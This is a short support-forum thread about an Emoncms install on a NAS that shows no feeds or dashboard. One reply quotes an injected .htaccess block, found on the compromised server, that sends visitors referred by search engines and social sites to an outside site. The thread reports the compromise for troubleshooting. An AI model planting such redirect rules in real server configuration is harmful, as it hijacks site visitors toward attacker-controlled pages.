Emoncms, no dashboard, feeds og input

I'm running a emoncms version that's a couple of months old (on my synnology NAS). Been working fine. I can still log in (GUI) and data is still collected in the DB but I can't se any data in my dashboard also there is no feeds or inputs visible in the GUI. No errors are thrown in the GUI. 
 
Is there a log I can take a look at to see what kind of errors are thrown? 
 
 
 
Regards 
 
Mads

 

 

TrystanLea's picture

Re: Emoncms, no dashboard, feeds og input

 In index.php

make sure:

 

ini_set('display_errors', 'on');
error_reporting(E_ALL ^ E_NOTICE);

are all uncommented, definetly worth your while though upgrading to the latest version ;)

 

trendt's picture

Re: Emoncms, no dashboard, feeds og input

Looks like little NAS webserver has been compromised. Someone added the following to .htaccess.

#c3284d#
<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)

RewriteRule ^(.*)$ http://michaelmazur.net/xml.php [R=301,L]

</IfModule>
#/c3284d#

 

 

TrystanLea's picture

Re: Emoncms, no dashboard, feeds og input

 Hmmm o dear! that's not good! any idea how it was compromised?

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.